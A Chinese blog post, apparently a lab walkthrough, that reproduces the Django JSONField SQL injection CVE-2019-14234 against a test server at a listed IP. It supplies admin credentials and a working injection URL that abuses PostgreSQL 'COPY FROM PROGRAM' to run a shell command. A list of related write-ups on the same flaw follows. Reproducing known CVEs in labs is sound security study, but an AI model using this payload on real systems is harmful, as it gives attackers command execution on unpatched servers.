漏洞django-cve_2019_14234 SQL注入

已于 2022-05-13 14:12:04 修改
阅读量452 收藏
点赞数
文章标签: 安全
于 2022-05-13 13:30:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62791432/article/details/124749698
版权

访问http://110.40.154.100:8000/进入页面

 登录环境:
访问:http://110.40.154.100:8000/admin输入默认账户密码
账户:admin
密码:a123123123
登录成功后看到以下界面: 

使用GET参数构造detail__a'b=123 提交

http://110.40.154.100:8000/admin/vuln/collection/?detail__a%27b=123

http://110.40.154.100:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 %3bcopy cmd_exec FROM PROGRAM 'touch /tmp/vuln.txt'--%20

"touch /tmp/vuln.txt"即为系统命令,创建文件

 当提示“no results to fetch”即为执行成功。 

Strife.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
CVE-2019-14234 Django JSONField SQL注入漏洞复现
m0_48520508的博客
07-28 2476
0x01简介 Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。 什么是JSONField,Django是一个大而全的Web框架,其支持很多数据库引擎,包括Postgresql、Mysql、Oracle、Sqlite3等,但与Django天生为一对儿的数据库莫过于Postgresql了,Django官方也建议配合Postgresql一起使用。 相比于Mysql,Postgresql支持的数据类型更加丰富,其对JSON格式数据的支持也让这个关系型数据库拥有
【WEB攻防】【CVE-2019-14234Django JSONField SQL注入 复现
AAAAAAAAAAAA66的博客
12-19 1589
BMZCTF 【CVE-2019-14234Django JSONField SQL注入
CVE-2019-14234 Django JSONField SQL注入漏洞
weixin_45260839的博客
06-25 1672
CVE-2019-14234 Django JSONField SQL注入漏洞
django SQL注入(CVE-2019-14234)
最新发布
m0_65150886的博客
02-26 496
Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。Django采用了MTV的框架模式,即模型M,视图V和模版T,使用Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。在1.11.x before 1.11.23、2.1.x before 2.1.11和2.2.x before 2.2.4的版本中,Django存在安全漏洞Django中使用了JSONField并且查询的“键名”可控,导致存在SQL注入漏洞
16 - vulhub - Django JSONField/HStoreField SQL注入漏洞CVE-2019-14234
易编橙 · 终身成长社群,相遇已是上上签!
11-03 1135
Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。 什么是JSONField,Django是一个大而全的Web框架,其支持很多数据库引擎,包括Postgresql、Mysql、Oracle、Sqlite3等,但与Django天生为一对儿的数据库莫过于Postgresql了,Django官方也建议配合Postgresql一起使用。 相比于Mysql,Postgresql支持的数据类型更加丰富,其对JSON格式数据的支持也让这个关系型数据库拥有了NoSQ
django_cve_2019_19844_poc:适用于CVE-2019-19844的PoC(https:www.djangoproject.comweblog2019dec18security-releases)
02-04
cve_2019_19844_poc PoC要求Python 3.7.x PostgreSQL 9.5或更高建立创建数据库(例如django_cve_2019_19844_poc ) 将数据库名称设置为环境变量DJANGO_DATABASE_NAME (例如, export DJANGO_DATABASE_NAME=django_...
Django_CVE-2020-9402_Geo_SQL注入分析1
08-03
Django_CVE-2020-9402_Geo_SQL注入分析1
django-scheduler_python_django_
10-01
A calendaring app for Django.
django-firebird_for DJ.3.X.rar
01-28
firebird资源包
Django-Internship_3March2021:Django-Internship_3March2021
03-09
Django-Internship_3March2021:Django-Internship_3March2021
Django JSONField/HStoreField SQL注入漏洞CVE-2019-14234
EC_Carrot的博客
05-25 227
漏洞背景 Django2019年8月1日发布了一个安全更新,修复了在JSONField、HStoreField两个模型字段中存在的SQL注入漏洞。该漏洞需要开发者使用了JSONField/HStoreField,且用户可控queryset查询时的键名,在键名的位置注入SQL语句。Django自带的后台应用Django-Admin中就存在这样的写法,我们可以直接借助它来复现漏洞。 影响范围 Django 2.2.x < 2.2.4 Django 2.1.x < 2.1.11 Django 1.
django-cve_2019_14234
m0_67612076的博客
05-13 291
地址:http://110.40.154.100:8080/ 打开:http://110.40.154.100:8080/admin 账号是:admin 密码随便输入,然后用burpsuite抓包 3.1 打开burpsuite进行抓包 进入proxy 点击Intercept is off 暴力破解 密码:a123123123 进入后台 测试是否存在注入点:http://110.40.154.100:8080/admin/vuln/collection/?detail__a%27
Django JSONFieldHStoreField SQL注入漏洞CVE-2019-14234
黑白的博客
12-13 358
声明 好好学习,天天向上 漏洞描述 该漏洞需要开发者使用了JSONField/HStoreField,且用户可控queryset查询时的键名,在键名的位置注入SQL语句。 Django通常搭配postgresql数据库,而JSONField是该数据库的一种数据类型。该漏洞的出现的原因在于Django中JSONField类的实现,Django的model最本质的作用是生成SQL语句,而在Django通过JSONField生成sql语句时,是通过简单的字符串拼接。 通过JSONField类获得KeyTransf
vulhub之CVE-2019-14234
u012871930的博客
03-20 332
web安全sql注入CVE-2019-14234,编码
CVE-2019-14234漏洞复现(SQL注入
weixin_71090536的博客
09-23 333
漏洞环境(路径):vulhub / django / CVE-2019-14234。1. 首先,使用用户名和密码登录 Django-Admin。用户名密码为:admin / a123123123。即表明此处含有 SQL 注入漏洞。3. 在其 URL 中添加 GET 参数。
CVE-2019-14234笔记
地址ch3nye.top
12-14 1029
Django JSONField/HStoreField SQL注入漏洞CVE-2019-14234) 参考 https://www.leavesongs.com/PENETRATION/django-jsonfield-cve-2019-14234.html 练习靶场 https://github.com/vulhub/vulhub/tree/master/django/CVE-2019-14...
CVE-2019-14234——SQL注入漏洞
战神/calmness的博客
11-21 1668
CVE-2019-14234Django JSONField SQL注入漏洞复现 你剥开一个很酸的橙子而感到后悔了,可对于橙子来说,那是它的一切. 该漏洞需要开发者使用了JSONField/HStoreField,且用户可控queryset查询时的键名,在键名的位置注入SQL语句。 漏洞概述: Django通常搭配postgresql数据库,而JSONField是该数据库的一种数据类型。该漏...
django-admin list_display
05-26
`list_display` 是 Django 中的一个 ModelAdmin 类的属性,用于定义在管理页面中显示哪些字段。它是一个包含字段名称的元组或列表,可以包括模型中的任何字段、属性或方法。例如: ```python from django.contrib ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Strife.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值